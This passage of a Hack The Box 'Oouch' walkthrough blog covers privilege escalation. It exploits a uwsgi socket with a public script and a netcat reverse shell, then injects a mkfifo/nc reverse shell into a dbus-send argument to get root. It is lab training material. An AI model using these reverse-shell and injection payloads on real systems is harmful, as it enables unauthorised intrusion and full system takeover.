Error org.freedesktop.DBus.Error.AccessDenied: Rejected send message, 1 matched rules; type="method_call", sender=":1.136" (uid=1000 pid=4558 comm="dbus-send --system --print-reply --dest=htb.oouch.") interface="htb.oouch.Block" member="Block" error name="(unset)" requested_reply="0" destination="htb.oouch.Block" (uid=0 pid=2568 comm="/root/dbus-server ")
qtc@aeb4525789d8:/code/oouch$ 

And no success.I m not privileged to run dbus-send on that interface.Bcz the file we have is owned by root itself.

Exploiting uwsgi service

And the service uwsgi is running as www-data

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
qtc@aeb4525789d8:/code$ ps -aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.0   5488  3116 ?        Ss   08:29   0:00 /bin/bash ./start.sh
root        14  0.0  0.0  15852  2924 ?        Ss   08:29   0:00 /usr/sbin/sshd
root        27  0.0  0.0  10476   844 ?        Ss   08:29   0:00 nginx: master process /usr/sbin/nginx
www-data    28  0.0  0.0  11264  3732 ?        S    08:29   0:00 nginx: worker process
www-data    29  0.0  0.0  11264  3732 ?        S    08:29   0:00 nginx: worker process
www-data    30  0.3  1.1  57492 46588 ?        S    08:29   0:02 uwsgi --ini uwsgi.ini --chmod-sock=666
www-data    31  0.0  0.9  57492 37260 ?        S    08:29   0:00 uwsgi --ini uwsgi.ini --chmod-sock=666
www-data    32  0.0  0.9  57492 37260 ?        S    08:29   0:00 uwsgi --ini uwsgi.ini --chmod-sock=666
www-data    33  0.0  0.9  57492 37260 ?        S    08:29   0:00 uwsgi --ini uwsgi.ini --chmod-sock=666
www-data    34  0.0  0.9  57492 37260 ?        S    08:29   0:00 uwsgi --ini uwsgi.ini --chmod-sock=666
www-data    35  0.0  0.9  57492 37260 ?        S    08:29   0:00 uwsgi --ini uwsgi.ini --chmod-sock=666
www-data    36  0.0  0.9  57492 37260 ?        S    08:29   0:00 uwsgi --ini uwsgi.ini --chmod-sock=666
www-data    37  0.0  0.9  57492 37260 ?        S    08:29   0:00 uwsgi --ini uwsgi.ini --chmod-sock=666
www-data    38  0.0  0.9  57492 37260 ?        S    08:29   0:00 uwsgi --ini uwsgi.ini --chmod-sock=666
www-data    39  0.0  0.9  57492 37260 ?        S    08:29   0:00 uwsgi --ini uwsgi.ini --chmod-sock=666
www-data    40  0.0  0.9  57492 37260 ?        S    08:29   0:00 uwsgi --ini uwsgi.ini --chmod-sock=666

And the version is

1
2
3
qtc@aeb4525789d8:/code$ uwsgi --version
2.0.17.1
qtc@aeb4525789d8:/code$ 

I searched for possible exploits for the service and got success.Found this python script on the github.

uwsgi_exp.py

The script needs some modifications on the line 18-19 with our requirements.

Chnaged the following

1
2
    if sys.version_info[0] == 3: import bytes
    s = bytes.fromhex(s) if sys.version_info[0] == 3 else s.decode('hex')

To

1
s = bytes.fromhex(s)

There are two ways to run the exploit with url and unix mode The socket file is saved in /tmp/uwsgi.socket.

1
2
3
4
5
qtc@aeb4525789d8:/tmp$ ls -la
total 8
drwxrwxrwt 1 root     root     4096 Mar 26 08:29 .
drwxr-xr-x 1 root     root     4096 Feb 25 12:33 ..
srw-rw-rw- 1 www-data www-data    0 Mar 26 08:29 uwsgi.socket

Since we cant access docker from our attacking machine so we need to transfer netcat and exploit.py to oouch machine first and then move them to docker using scp.

1
2
3
4
qtc@oouch:~$ scp -i .ssh/id_rsa exploit.py  qtc@172.18.0.2:/tmp
exploit.py                                    100% 4333     5.4MB/s   00:00    
qtc@oouch:~$ scp -i .ssh/id_rsa nc  qtc@172.18.0.2:/tmp
nc                                            100%   35KB  22.2MB/s   00:00    

Now i can run the exploit.py and i opened another terminal and logged in as qtc on oouch and listening on port 1234.

1
2
3
4
qtc@aeb4525789d8:/tmp$ python exploit.py -m unix -u /tmp/uwsgi.socket -c "/tmp/nc -e /bin/bash 172.18.0.1 1234"
[*]Sending payload.

qtc@aeb4525789d8:/tmp

Shall as www-data

Got connection back on my nc listener

1
2
3
4
5
qtc@oouch:~$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [172.18.0.1] from (UNKNOWN) [172.18.0.2] 41652
whoami
www-data

Exploiting DBUS

Now , If u run that debus-send command we used previously.We got root

1
www-daat@oouch:~$ dbus-send --system --print-reply --dest=htb.oouch.Block /htb/oouch/Block  htb.oouch.Block.Block "string:;rm /tmp/.0; mkfifo /tmp/.0; cat /tmp/.0 | /bin/bash -i 2>&1 | nc 10.10.15.135 2345 >/tmp/.0;"
1
2
3
4
5
6
➜  prashant git:(master) ✗ nc -nlvp 2345
listening on [any] 2345 ...
connect to [10.10.15.135] from (UNKNOWN) [10.10.10.177] 38152
bash: cannot set terminal process group (2568): Inappropriate ioctl for device
bash: no job control in this shell
root@oouch:/root#

Got root.txt

1
2
3
4
root@oouch:/root# cat root.txt
cat root.txt
e23--------------------------fd7d
root@oouch:/root#

And we got root…..

If u liked the writeup.Support a Poor Student to Get the OSCP-Cert on BuymeaCoffee

Thanks.

If you want to get notified as soon as i upload something new to my blog So just click on the bell icon you are seeing on the right side – > and allow push notification

Resources

TopicDetails
Attacking Oauth2https://dhavalkapil.com/blogs/Attacking-the-OAuth-Protocol/
Uwsgi-exploithttps://github.com/wofeiwo/webcgi-exploits/blob/master/python/uwsgi_exp.py
Updated Aug 30, 2020 2020-08-30T09:39:53+00:00
This post is licensed under CC BY 4.0

© 2020 Prashant Saini. All rights reserved.